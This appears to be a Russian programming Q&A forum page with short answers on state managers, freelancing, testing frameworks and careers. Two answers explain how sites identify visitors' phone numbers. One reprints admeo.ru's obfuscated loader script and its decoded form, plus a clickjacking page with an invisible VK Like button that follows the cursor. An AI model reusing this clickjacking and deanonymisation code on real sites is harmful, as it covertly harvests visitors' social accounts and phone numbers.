• Как определяют номер телефона у посетителей сайта?

    @granty
    Куки исключены, браузер не сохраняет их и не хранит историю.

    1. Про evercookie слышали? А про Web Fingerprint?
    На хакере перечислена масса способов хранить ID на вашем компе без использования Куков и кэша, а технология Web Fingerprint позволяет хранить цифровой отпечаток компа, браузера на сервере банка: Фингерпринтинг конкретного ПК с точностью 99,24%, не спасает даже смена браузера.

    Если вы - клиент банка и заходили в его интернет-банкинг, он легко может вас опознать при использовании того же браузера и того же компа.
    А если у вас на мобиле установлено приложение интернет-банкинга - вы вообще под колпаком :)

    2. Если вы лазите по инету залогиненым в Вконтакте/Яндексе, то через backdoors в их API можно определить ваш профиль и все ваши данные.
    Сайт Соцфишинг работает на этом принципе.
    Сам банк тоже может использовать соцфишинг и ставить невидимый ифрейм на своё меню, и при клике вы автоматически авторизуетесь через аккаунт, например, Вконтакте. Зная ваш ID на Вконтакте, ваш телефон легко узнаётся, их базы регулярно сливаются и продаются

    PS: Узнать как конкретно вас "слил" и каким образом - невозможно без исследования конкретной ситуации.

    факультатив

    Всё вышеперечисленное - детский лепет по сравнению с тем, какие возможности имеет Google (и, частично, Яндекс с Apple).
    У всех дома стоит точка WiFi, к которой коннектится ваш комп и мобильник с Андроид. Через мобильник Гугл знает все номера телефонов, которые подключаются к этой точке доступа (и все аккаунты соцсетей в которые вы логинились с мобильника). Поэтому когда вы лезете Хромом с компа через эту же точку доступа - Гугль уже знает, что это вы (или один из ваших домочадцев). По GPS на мобильнике он знает даже адрес вашего проживания с точностью до подъезда.
    Так что мы все давно уже добровольно "чипованы", чего удивляться что о нас всё известно.
    Ответ написан
    Комментировать
  • Насколько вообще нужны менеджеры состояний?

    @abberati
    frontend-разработчик
    Стейт менеджер нужен для консистентного управления состоянием приложения, внезапно.
    Если вы не пользуетесь менеджером состояния в реакт-приложении, то либо используете контекст (вот хорошее объяснение, почему на проде так делать не нужно), либо пишете заведомо неподдерживаемое приложение. Ну или ваше приложение — это игра в крестики-нолики с двумя полями в стейте корневого компонента.

    Большие приложения нельзя писать без стейт-менеджера — это выльется в огромную неподдерживаемую кучу спагетти.
    Ответ написан
    2 комментария
  • Как начать зарабатывать в 14 лет?

    Я в 15 лет лутал деньги так:

    1) Играл в WOW за хиллера
    2) Ходил в рандом данжи хиллером (за него самый быстрый поиск)
    3) По окончанию данжи падали баджи
    4) Баджи менял на камни
    5) Камни продавал
    6) На золото покупал шкуры
    7) Повышал на них стоимость и снова продавал
    8) Продавал золото через чат
    __

    В месяц выходило порядка 10к, выводил деньги на карту старшего брата через веб-мани.
    Ответ написан
    4 комментария
  • Как выбрать e2e & unit testing framework для приложения на React?

    @camelCaseVlad
    Хай! Вчера весь день писал юнит тесты после рефакторинга и поэтому внесу свой вклад.

    Для юнит тестов используем Jest, создание снапшотов заметно упрощают тестирование UI.

    е2е выполнен в Сайпресс. У нас в команде е2е тесты пишет тестер, и он и остальные тестеры в компании не нарадуются им.
    Ответ написан
    3 комментария
  • Аналоги js в web?

    @itsjustmypage
    Комментировать
  • Офис или фриланс?

    inoise
    @inoise
    Solution Architect, AWS Certified, Serverless
    В офис. На фрилансе без реального опыта делать особо нечего. Поучитесь в команде, приобретёте дополнительные полезные навыки
    Ответ написан
    Комментировать
  • Как быть, если клиент после сделанной мной работы заплатил деньги и через некоторое время требует дополнить сайт и при этом не хочет платить деньги?

    y0u
    @y0u
    dev
    Уже решаю вообще отдать им деньги которые мне заплатили за работу и удалить с хостинга сайт.


    Что это за бред? Работу сделали? Да. Вам заплатили? Да. Клиенту нужна новая работа? Должен заплатить.
    Не хочет платить? Не делайте работу.
    Каким боком здесь "отдать деньги и удалить сайт с хостинга" я понять не могу. Даже теоретически, как это поможет решить ситуацию?

    Как мне им, объяснить что это делается не бесплатно.

    Словами. И нет, я не издеваюсь. У вас есть определенные условия работы - вы их озвучиваете клиенту. Если его не устраивает - он найдет то, что его устраивает.

    Я вот, вроде, и написал какой-то ответ, но смысла вашего вопроса так и не понял. С такими вопросами, мне кажется, лучше ходить на форум, потому как это специализированный сервис, как по мне. Ваш вопрос похож на вопрос из разряда "просто поговорить".
    Ответ написан
    3 комментария
  • Как оценить стоимость разработки?

    mixail_fet
    @mixail_fet
    Дизайнер веб-интерфейсов
    Ответ написан
    1 комментарий
  • XMLHttpRequest или fetch?

    @askhat
    В идеальном мире у вас есть абстракция http клиента в которой вы легко меняете реализацию без изменений в остальном коде
    Ответ написан
    Комментировать
  • На чем зарабатывает Quora, toster или подобные сайты?

    shmatuan
    @shmatuan
    8 year of Web, 5 years of Vue
    Можно просто выключить адблок и увидеть ответ
    5bd0447166cd2277435374.png
    Ответ написан
    Комментировать
  • Дополнительный заработок программисту?

    При всем моем уважении, но такой подход крайне деструктивен для жизни.

    1) Принцип, чем больше херачишь, тем больше получаешь - не имеет перспектив, так как в какой-то момент появится ощущение, что вся ваша жизнь - это херачинье. Плюс, если произойдет какой-то сбой в графике работы, то вы не сможете уделять время заработку - и потеряете свои добавочные деньги.

    2) Поэтому рационально будет идти по двум путям:

    - увеличивать доход на своей текущей работе (либо при смене работы)
    - идти в полукоммерческую схему со своим продуктом.

    Т.е. если вы просто найдете способ себя продать дороже на работе, то вы будете делать все ту же работу (то же время), но при этом вам станет в разы приятнее жить. Во-вторых, вкладывайте силы в развитие того, что потом можно будет продать, как за время, так и сделать на основании этого собственный проект (продукт), и уже получить совсем другие деньги, на совсем других условиях.

    p.s. у меня в свое время была работа, поддержка ряда клиентов в it-инфрастуктуре, пару клиентов на поддержке сайтов, плюс контракты на продвижение сайтов. Просто вся жизнь превратилась в работу, как смог накопить на квартиру, сразу же от этого всего отказался в пользу жирной работы, и своих проектов.
    Ответ написан
    2 комментария
  • Запуск анимации только когда человек доскролил?

    @Flying
    В современных браузерах задача решается нативно через IntersectionObserver, для более старых есть polyfill.
    Ответ написан
    Комментировать
  • Жив ли русскоязычный фриланс?

    gadfi
    @gadfi
    https://gamega.org
    он не умер, он просто так пахнет
    Ответ написан
    7 комментариев
  • Учебный материал по работе с памятью?

    @potan
    Функциональный программист
    По возможности, выделяйте на стеке. Выделять в куче то, что можно выделить на стеке стоит если приложение сильно многопоточное, не 64-битное или используется без MMU.
    Если не получается выделить на стеке (Rust об этом сообщит ошибками во владении), то выделяйте в куче.

    На C++ лучше не смотрите - там слишком много сложностей.
    Ответ написан
    Комментировать
  • Фриланс в России без подписок?

    ZLOFENIX
    @ZLOFENIX
    Абсолютно поехавший
    Odesk например, а наши давно уже стали выжимать максимум из каждой кнопки. Фрилансру - всегда выжимал денег, фрилансим - сразу 500р жмут, при этом это кусок хабра, у которого написано про не блокируйте рекламу, нам кушать нечего.
    Ответ написан
    9 комментариев
  • Почему angularjs уделяют так много внимания?

    riky
    @riky
    Laravel
    потому что все ходят с такими вопросами. рекурсия...
    Ответ написан
    Комментировать
  • Как admeo.ru узнает номер телефона?

    27cm
    @27cm
    TODO: Написать статус
    Clickjacking

    О кликджекинге написано много статей, в том числе и на Хабре, но всё же заглянем внутрь admeo.ru и посмотрим, как это реализовано у них.

    1. В коде есть скрипт, буквально бросающийся в глаза:
    <script src="data:text/javascript;charset=utf-8;base64,KGZ1bmN0aW9uKGIsYyl7c2V0VGltZW91dChmdW5jdGlvbigpe3ZhciBhPWRvY3VtZW50LGY9YS5nZXRFbGVtZW50c0J5VGFnTmFtZSgic2NyaXB0IilbMF0scz1hLmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpLGg9ZXNjYXBlKGEucmVmZXJyZXIpO3MudHlwZT0idGV4dC9qYXZhc2NyaXB0IjtzLmNoYXJzZXQ9IlVURi04IjtzLmFzeW5jPSEwO3Muc3JjPSIvLyIrYisiLyIrYysiLmpzP3I9IitNYXRoLnJhbmRvbSgpO2YucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUocyxmKX0sMCl9KSgiYWRtZW8ucnUiLCJlZGI0MmE4MTg3MzE4NTY5NmFjNTJlMmJiNGJmNmVlYSIpOw==" async=""></script>

    2. Декодируем:
    (function(b,c){setTimeout(function(){
    var a=document,f=a.getElementsByTagName("script")[0],
    s=a.createElement("script"),h=escape(a.referrer);s.type="text/javascript";
    s.charset="UTF-8";s.async=!0;s.src="//"+b+"/"+c+".js?r="+Math.random();
    f.parentNode.insertBefore(s,f)},0)})("admeo.ru","edb42a81873185696ac52e2bb4bf6eea");

    3. Внутри edb42a81873185696ac52e2bb4bf6eea.html:
    <html>
    <head></head>
    <body onclick="admeoVk.click()">
    <div id="vk_api_transport"></div>
    <div id="cwvkid" style="cursor:pointer!important;clear: both;background: none;position: fixed !important;top: 0;left: 0;bottom: 0;right: 0;width: 100%;height: 100%;border: none;margin: 0;padding: 0;opacity: 0;z-index: 88888;visibility: visible;"></div>
    <div id="myvklogin"></div>
    <script language="JavaScript">
        var admeoParams = {
            token: 'edb42a81873185696ac52e2bb4bf6eea',
            apiUrl: 'http://admeo.ru/',
            appId: 4906527,
            host: 'admeo.ru',
            siteId: 15,
            cName: 'amuid'
        };
    
        (function(i,s,o,g,r,a,m){i['AdmeoObject']=r;i[r]=i[r]||function(){
                (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script', 'http://static.admeo.ru/assets/core/_vk.js','admeo');
    </script>
    </body>
    </html>

    Странное решение оставить cursor:pointer!important...
    4. static.admeo.ru/assets/core/_vk.js
    5. Прозрачная кнопка Like Вконтакте движется под курсором и ждёт, когда на неё кликнут:
    window.onmousemove = function(e){
        document.querySelector('#cwvkid').style.left = e.pageX - 70;
        document.querySelector('#cwvkid').style.top = e.pageY - 12;
    };
    Ответ написан
    10 комментариев
  • Области применения JS в современном IT?

    @GreatRash
    JS применяется сейчас везде практически: фронтенд, бекенд, разработка приложений, игры. Кто его знает куда его ещё занесёт в будущем.
    Ответ написан
    1 комментарий
  • Что стоит изучать начинающему python-программисту?

    Внесу свои 5 копеек, с курса 1го работаю(не только программистом):
    Всем привет! Я студент, учусь на втором курсе. До недавнего времени плыл по течению, просто хорошо учился в инсте (т.е. есть только опыт написания простых прогармм на Дельфи), сейчас же финансовое положение в семье заставило задуматься о своём будущем.

    Как бы избито это не звучало, но забудь подходы к программированию, которые у тебя были в ВУЗе, тот опыт полезен, но пока его придержи. Начни с освоения контроля версий, разберись с пакетами, зависимостями, привыкай перед тем как приступить к задаче, сначала исследовать - никто ли до тебя не занимался ли решением такой же задачи? В общем старайся максимально использовать чужой код, анализировать его, смотреть с какими проблемами сталкивались люди при его написании и т.д. И старайся писать понятный, не только тебе, код.
    Анализ чужого кода - важная, недооценённая студентами, составляющая работы.

    Начал изучать Питон (взял на курсере "Intro to interactive programming in Python", сейчас перехожу ко второй его части), т.к. он используется в DSP и компьютерном зрении, а мне эти области интересны. Также полезной вещью в моём багаже будет MySQL, который у меня сейчас идёт в универе.

    Питон относительно спорное начинание. Да, в перспективе - он хорош, но, субъективно, найти работу на PHP без коммерческого опыта - проще(это если финансовое положение такое что надо вот сейчас найти работу). Спрос большой, ровно как и спектр задач. Когда в голове будет понимание спектра задач для языка и вообще того какие задачи возникают в коммерческой разработке, тогда уже можно примерять Python к тем задачам которые перед тобой стояли.
    Если есть время(3-6 месяцев) то можно подучить джангу/фласк(только что-то одно) и идти работать стажёром - бесплатно или же помогать в open source(тут как раз и поймёшь примерные задачи, которые будут вставать перед тобой в работе, потому как туториалы хорошо, а реальность отличается).
    Не знаю как у вас дают БД, у нас давали так себе, поэтому лучше дотягивай сам, хотя бы то как язык работает с базой.
    Если хочешь научное - компьютерное зрение и т.д., устраивайся на кафедру (вариант с натяжкой - работу где у тебя будет много свободного времени(сторож, продавец простаивающий)) и штудируй литературу пачками, т.к. минимальные требования там высокие и нужно больше фундаментальных знаний, нежели знания ЯП. Плюс ко всему - участие во всех олимпиадах по программированию, интересные курсовые работы, по актуальным темам.

    Среднесрочную задачу я перед собой поставил конкретную: через год устроиться на оплачиваемую стажировку, чтобы начать получать хотя бы какие-то деньги и опыт. Поэтому вариант с поступлением в ШАД, который я изначально рассматривал как основной, отпал, и я решил перенести эту затею на год вперёд.

    На год вперед после работы? Потому как ШАД+оплачиваемая стажировка+учеба = ничего. Нигде не будешь успевать. По большому счёту - не ШАДом единым, если год самообучения, плюс год работы, то лучше включить в эти 2 года ещё и изучение того что проходят в ШАД, чтобы быть подкованнее

    В итоге у меня вопрос: что посоветуете сделать/изучить? Сконцентрироваться на Django, мб html/css, и т.п. и гарантированно идти стажироваться в заданный срок? Или рискнуть, попробовать делать то, что интересно (изучить dsp на базе питона, либо opencv), и податься в какое-нибудь крутое место типа Яндекса, в надежде, что на тебя обратят внимание? (Наиболее туманный для меня вариант). Ещё недавно возникла идея попробовать себя в связке веба, и, например, машинного обучения, может тоже неплохо? В общем, помогите советом нубу)

    Выше писал. Тут стоит оценить риски и ситуацию в семье. В принципе, если попадётся хороший руководитель и ты сможешь его убедить цифрами что машинное обучение принесёт пользу бизнесу, то сможешь совместить и связку веба и машинное обучение, плюс подтянуть курсовые и дипломные на эту тему(заработать миллон долларов, прославиться, написать свой язык программирования)
    P.S. Не выпускник ШАДа, обычный человек-программист
    Ответ написан
    3 комментария
  • С чего продолжить переход на администрирование Linux?

    opium
    @opium
    Просто люблю качественно работать
    Почти всю жизнь я менял работу с понижением зп и потом её резким ростом, если на старом месте скучно то смысл там сидеть.
    Ответ написан
    Комментировать